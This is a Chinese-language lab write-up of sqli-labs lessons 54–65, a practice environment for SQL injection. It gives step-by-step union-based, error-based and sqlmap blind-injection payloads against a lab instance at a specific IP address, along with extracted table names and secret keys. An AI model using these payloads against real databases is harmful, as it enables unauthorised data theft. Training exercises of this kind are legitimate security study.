zoukankan      html  css  js  c++  java

  • sqlilab-Less-54-65-writeup

    Less-54 GET请求联合查询10步拿key 单引号

    进行联合查询注入的时候需要注意,前期判断是否成功闭合,判断字段数,都是要确保后台数据库存在字段id的编号,这里测试可以写ID=1,2,3 写其他数字看不到效果,然后开始查表名等其他后续操作就可以写个不存在的id编号即可

    判断闭合方式是否成功
    ?id=1'--+

    判断字段数
    ?id=1' order by 3--+
    ?id=1' order by 4--+

    确认可以注入的字段
    ?id=-1' union select 1,2,3 --+
    根据显示的结果是可以通过2和3查看

    查表名
    http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

    显示结果:
    Your Login name:2
    Your Password:BROZHOX7ME

    查字段名
    http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28column_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x42524f5a484f58374d45%29--+

    BROZHOX7ME ---> 16进制42524f5a484f58374d45 在线转换:https://www.bejson.com/convert/ox2str/

    显示结果:
    Your Login name:2
    Your Password:id
    sessid
    secret_FDK5
    tryy

    查询字段值
    http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28secret_FDK5%29+FROM+BROZHOX7ME%29--+

    显示结果:
    Your Login name:2
    Your Password:oNf3esAKnoNVUbViCYCbGPzv

    Less-55 GET请求联合查询14步拿key 小括号

    跟Less-54一样的payload,拼合方式由单引号改成了小括号

    判断闭合方式是否成功
    ?id=1)--+

    http://106.54.35.126/Less-55/
    ?id=-1) union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

    其他操作跟Less-54一样


    Less-56 GET请求联合查询14步拿key 单引号 小括号

    判断闭合方式是否成功
    ?id=1')--+

    http://106.54.35.126/Less-56/?id=-1%27%29%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

    其他操作跟Less-54一样


    Less-57 GET请求联合查询14步拿key 双引号

    判断闭合方式是否成功
    ?id=1"--+

    http://106.54.35.126/Less-57/?id=-1%22%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+


    Less-58 GET请求5步拿key 单引号

    此关卡不能使用联合查询,因为用户输出的数组且被逆序了,所以使用报错注入效果显著

    http://106.54.35.126/Less-58/?id=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-59 GET请求5步拿key

    跟Less-58一样,拼合方式是整型,不加单引号

    http://106.54.35.126/Less-59/?id=1+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-60 GET请求5步拿key

    跟Less-58一样,拼合方式是双引号和小括号

    http://106.54.35.126/Less-60/?id=1%22%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-61 GET请求5步拿key

    跟Less-58一样,拼合方式是单引号和双小括号

    http://106.54.35.126/Less-61/?id=1%27%29%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

    Less-62 GET请求5步拿key

    跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号和一个小括号

    使用sqlmap进行布尔型盲注

    python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --level=3 --risk=3 --dbs --batch

    Less-63 GET请求5步拿key

    跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号

    使用sqlmap进行布尔型盲注

    python sqlmap.py -u http://106.54.35.126/Less-63/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    Less-64 GET请求5步拿key

    跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是双小括号

    使用sqlmap进行布尔型盲注

    python sqlmap.py -u http://106.54.35.126/Less-64/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    Less-65 GET请求5步拿key

    跟Less-58一样,但是把显错取消, 所以这里只能布尔型盲注和时间延时盲注,拼合方式是单引号和小括号

    使用sqlmap进行布尔型盲注

    python sqlmap.py -u http://106.54.35.126/Less-65/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

    迷茫的人生,需要不断努力,才能看清远方模糊的志向!
  • 相关阅读:
    手工去除 dll 和 exe 文件的数字签名
    针式PKM中级应用:文件的5S(归档整理删除)
    针式PKM初级应用:如何避免收集重复的资料?
    了解更多:什么是个人知识管理?
    如何选用知识管理软件?
    与阿朱聊个人知识管理:体系和方法论层面
    针式PKM初级应用:针式PKM每天应使用多少小时?
    战略人生
    针式PKM初级应用:针式PKM更适合管理什么样的文件
    Data, Information, and Knowledge Management Software "What software should I use?"
  • 原文地址:https://www.cnblogs.com/autopwn/p/13730992.html
Copyright © 2011-2022 走看看